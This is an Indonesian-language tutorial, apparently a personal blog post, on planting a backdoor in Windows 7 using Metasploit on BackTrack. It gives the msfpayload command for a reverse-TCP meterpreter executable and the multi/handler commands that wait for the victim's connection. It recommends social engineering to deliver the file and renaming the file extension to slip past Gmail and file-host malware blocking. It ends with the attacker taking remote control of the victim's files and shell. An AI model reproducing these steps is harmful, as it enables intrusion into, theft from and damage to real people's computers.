Semakin banyaknya aplikasi eksploitasi memperkuat paradigma akan tidak adanya sistem yang aman. Bahkan sistem keamanan Windows 7 yang sudah di patch dari beberapa kelemahan yang terdapat pada varian sebelumnya   (Windows XP dan Vista) ternyata masih bisa dieksploitasi. Bahkan cara eksploitasi kelemahan tersebut  hampir sama dengan eksploitasi pada varian windows sebelumnya, menggunakan meterpreter. Serangan ini memang jenis serangan standar, akan tetapi masih bisa digunakan serta dipahami oleh user awam untuk mengerti akan kerawanan sistem dan bahaya aksi vandal yang dilakukan attacker dengan mengancam informasi rahasia user.  Pada tulisan ini, saya akan mencoba membuat sebuah backdoor menggunakan bantuan metasploit yang terdapat pada paket distribusi back|track. Tulisan ini tidak mendiskritkan mengenai kelemahan sebuah OS, setiap OS memiliki kelemahan masing-masing, begitu juga dengan Linux. Linux masih mungkin di eksploitasi sama dengan Windows, akan tetapi menggunakan metoda yang berbeda, Rootkit.

Langkah pertama yang perlu dilakukan untuk memasang backdoor pada target windows 7 adalah membuat file tersebut terlebih dahulu. Cara membuat file nya pun tergolong mudah.  cukup mengetikkan perintah di bawah ini pada terminal backt|track anda.

msfpayload windows/meterpreter/reverse_tcp LHOST=[IP Attacker] LPORT=[Port] x > /folderpenyimpanan/namafile.ekstensi

contoh :

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.28.2 LPORT=4444 x > /root/Desktop/Downloader.exe

 

File backdoor yang dibuat oleh metasploit tersebut akan tersimpan pada Desktop back|track. Hal ini sesuai dengan media penyimpanan yang dipilih sebelumnya. Setelah file tersebut terbentuk, untuk mendistribusikannya, bisa menggunakan beberapa cara, bisa dengan bypass langsung/serang langsung pada target atau menggunakan teknik soceng terhadap korban. Untuk mendistribusikan dengan teknik soceng, attacker cukup mengupload file backdoor di internet atau bisa mengirimkan file tersebut kepada korban.

Gambar diatas merupakan screenshot dari percobaan mengirimkan file backdoor menggunakan e-mail. Dalam percobaan diatas, saya menggunakan layanan gmail untuk mendistribusikannya, akan tetapi gmail mem-block aksi yang dilakukan karena terindikasi file tersebut mengandung virus/malware. Untuk mengakali hal tersebut sangat mudah, bisa dengan melakukan compile ulang terhadap prgoram (cracking program) atau dengan cara sederhana merubah tipe data file tersebut dari exe menjadi sebuah file. Kali ini saya akan memilih opsi yang lebih cepat dengan merubah tipe data file dan mencoba mendistribusikannya kembali

Setelah melakukan perubahan terhadap tipe data file, website file hosting seperti 4shared sudah tidak melakukan block lagi terhadap file backdoor. Sampai pada tahapan ini tugas kita sebagai attacker sudah selesai dilakukan. Tinggal bagaimana cara mendsitribusikan file tersebut. Saya asumsikan disini, attacker berhasil mempengaruhi korban untuk mendownload file tersebut, dan merubah kembali tipe data file menjadi file executable.

Sampai tahap ini, berarti proses menanam backdooring sudah sampai 60 persen, attacker tinggal menunggu korban mengeksekusi file tersebut dan mengaktifkan eksploitasi pada komputer attacker. Untuk mengaktifkan eksploit sendiri dapat mengetikkan perintah dibawah ini pada software eksploitasi metasploit

msf exploit (handler) > use /exploit/multi/handler

msf exploit (handler) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit (handler) > set LHOST [IP Attacker]

msf exploit (handler) > exploit

contoh

msf exploit (handler) > use /exploit/multi/handler

msf exploit (handler) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit (handler) > set LHOST 192.168.28.2

msf exploit (handler) > exploit

apabila metasploit sudah memberikan respon seperti diatas, berarti attacker sudah siap melakukan keseluruhan persiapan dan tinggal menunggu file backdoor dijalankan oleh client. Apabila file tersebut sudah dijalankan oleh client, maka metasploit akan memberikan respon seperti gambar dibawah ini

Apabila sampai tahapan ini berhasil dilakukan, berarti kita berhasil menanam backdoor dan bisa mengontrol komputer korban. Kita bisa memindahkan file, meng-copy file dari komputer korban bahkan menghapus file tersebut. Untuk memastikan apakah komputer yang kita susupi memang komputer korban dapat mengetikkan perintah sysinfo dan perintah shell untuk masuk kedalam terminal CMD korban. Berikut ditampilkan contoh penulisan dan gambar hasil proses

 

Apabila sudah sesuai dengan properties dari komputer korban, berarti backdoor berhasil ditanam dan misi sudah berhasil dilakukan. Untuk memastikan apakah benar-benar bisa melakukan proses penulisan file, pengopyan file bahkan penghapusan file silahkan langsung melakukannya pada terminal yang ada. Contoh kali ini saya akan mencoba membuat sebuah folder yang bernama test_backdooring pada desktop korban

sampai tahapan ini berarti proses telah selesai dilakukan, tergantung kreatifitas attacker untuk memanfaatkan komputer tersebut.